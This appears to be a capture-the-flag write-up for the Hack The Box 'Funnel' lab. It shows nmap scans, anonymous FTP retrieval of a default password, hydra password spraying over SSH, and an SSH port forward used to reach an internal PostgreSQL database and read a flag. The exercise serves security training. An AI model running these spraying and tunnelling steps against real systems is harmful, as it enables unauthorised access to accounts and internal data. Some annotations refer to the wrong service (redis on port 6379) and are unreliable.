08.FUNNEL (PASSWORD SPRAYING & LOCAL PORT FORWARDING)
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpnENUMERATE SERVICES
root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
* Typically '-sV' is used with Nmap to determine versions, but that's not always enough.
- adding the -sC is another good way to determine service versions
- the -sC option will run safe scripts which are designed to provide useful
information without being too intrusive or causing harm to the target systems.VULNERABILITY SCANNING
root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 21,22
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.215
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Nov 28 2022 mail_backup
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
* the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 21,22
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
* the --script=vuln will run scripts that focus specifically on detecting known
vulnerabilities in the service running on port 6379
- e.g., weak configurations, or known vulnerabilities in the redis service
- if no results are found then the service may be fully patched!FOOTHOLD/COMPROMISE
Submit root flag
#
root@oco:~$ ftp {targetIP}
220 (vsFTPd 3.0.3)
Name ({targetIP}:{username}): {anonymous}
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> help
cd dir ls type
chmod exit pwd
delete get quit
ftp> dir
drwxr-xr-x 2 ftp ftp 4096 Nov 28 2022 mail_backup
ftp> cd mail_backup
250 Directory successfully changed.
ftp> dir
229 Entering Extended Passive Mode (|||52450|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 58899 Nov 28 2022 password_policy.pdf
-rw-r--r-- 1 ftp ftp 713 Nov 28 2022 welcome_28112022
226 Directory send OK.
ftp> get password_policy.pdf
226 Transfer complete.
ftp> get welcome_28112022
226 Transfer complete.
ftp> exit
221 Goodbye.root@oco:~$ cat welcome_28112022
From: root@funnel.htb
To: optimus@funnel.htb albert@funnel.htb andreas@funnel.htb christine@funnel.htb maria@funnel.htb
Subject:Welcome to the team!
...
* users in the "from" and "to" lines can be used for password spraying
root@oco:~$ open password_policy.pdf
...default password
funnel123#!#
...#PASSWORD SPRAYING
root@oco:~$ cat > usernames.txt
optimus
albert
andreas
christine
maria
root
CTRL+C
root@oco:~$ hydra -L usernames.txt -p 'funnel123#!#' {target_IP} ssh
[DATA] attacking ssh://10.129.185.117:22/
[22][ssh] host: 10.129.185.117 login: christine password: funnel123#!#
1 of 1 target successfully completed, 1 valid password found#internal enumeration
root@oco:~$ ssh christine@{targetIP}
funnel123#!#
root@oco:~$ id
uid=1000(christine) gid=1000(christine) groups=1000(christine)
root@oco:~$ ss -tlpna
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:5432 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:35437 0.0.0.0:*
SYN-SENT 0 1 10.129.185.117:49946 8.8.8.8:53
ESTAB 0 0 10.129.185.117:22 10.10.14.215:50268
LISTEN 0 32 *:21 *:*
LISTEN 0 128 [::]:22 [::]:*
* the "local address:port" displays the local address on which a service listens
- addresses on 127.0.0.1 means that the specified port is only listening locally on the machine and cannot be accessed externally
- addresses 0.0.0.0 , * , and [::] indicate that a port is listening on all intefaces
- these are accessible externally, as well as locally
root@oco:~$ ss -tlpa
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.53%lo:domain 0.0.0.0:*
LISTEN 0 128 0.0.0.0:ssh 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:postgresql 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:35437 0.0.0.0:*
SYN-SENT 0 1 10.129.185.117:49946 8.8.8.8:53
ESTAB 0 0 10.129.185.117:ssh 10.10.14.215:50268 //this indicates that the attacker is connected from 10.10.14.215 via port 50268
LISTEN 0 32 *:ftp *:*
LISTEN 0 128 [::]:ssh [::]:*
christine@funnel:~$ which psql
christine@funnel:~$ psql
Command 'psql' not found, but can be installed with:
apt install postgresql-client-common
Please ask your administrator.
* the postgresql DB can be accessed using the 'psql' utility (if installed on the host)
- instead of uploading static binaries onto the target machine, an easier
way to bypass this roadblock is by a practice called port-forwarding,
or tunneling, using SSH#
root@oco:~$ ssh christine@10.129.22.40 -L 31173:127.0.0.1:5432
christine@10.129.22.40's password: funnel123#!#
* the ssh client (attackerMachine) will establish a secure connection
to the remote SSH server (targetMachine). the ssh client (attackerMachine)
will listen for incoming connections on the local port (attackerMachine)
on port 31173.
- when a client connects to the local port, the ssh client (attackingMachine)
will forward the connection to the remote server (targetMachine) on port
5432. this allows the local client (attackingMachine) to access services
on the remote server (targetMachine) as if they were running on the
local machine.
christine@funnel:~$ ss -tlpna
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:5432 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:38617 0.0.0.0:*
ESTAB 0 0 10.129.22.40:22 10.10.14.215:46754
SYN-SENT 0 1 10.129.22.40:42680 8.8.8.8:53
LISTEN 0 32 *:21 *:*
LISTEN 0 128 [::]:22 [::]:*#
root@oco:~$ psql -U christine -h localhost -p 31173
Password for user christine:
psql (15.8 (Debian 15.8-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
Type "help" for help.
christine=#
* ensure to specify localhost using the -h option to target the tunnel
created earlier with SSH, as well as port 31173 with the -p option,
which is the port the tunnel is listening on.
christine=# \list
List of databases
Name | Owner | Encoding | Collate | Ctype | ICU Locale | Locale Provider | Access privileges
-----------+-----------+----------+------------+------------+------------+-----------------+-------------------------
christine | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
postgres | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
secrets | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
template0 | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | =c/christine +
| | | | | | | christine=CTc/christine
template1 | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | =c/christine +
| | | | | | | christine=CTc/christine
(5 rows)
* this list the existing DB
christine=# \connect secrets
psql (15.8 (Debian 15.8-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
You are now connected to database "secrets" as user "christine".
* this connects to the specified DB
secrets=# \dt
List of relations
Schema | Name | Type | Owner
--------+------+-------+-----------
public | flag | table | christine
(1 row)
* list the database's tables
secrets=# select * from flag;
value
----------------------------------
cf277664b1771217d7006acdea006db1
(1 row)Last updated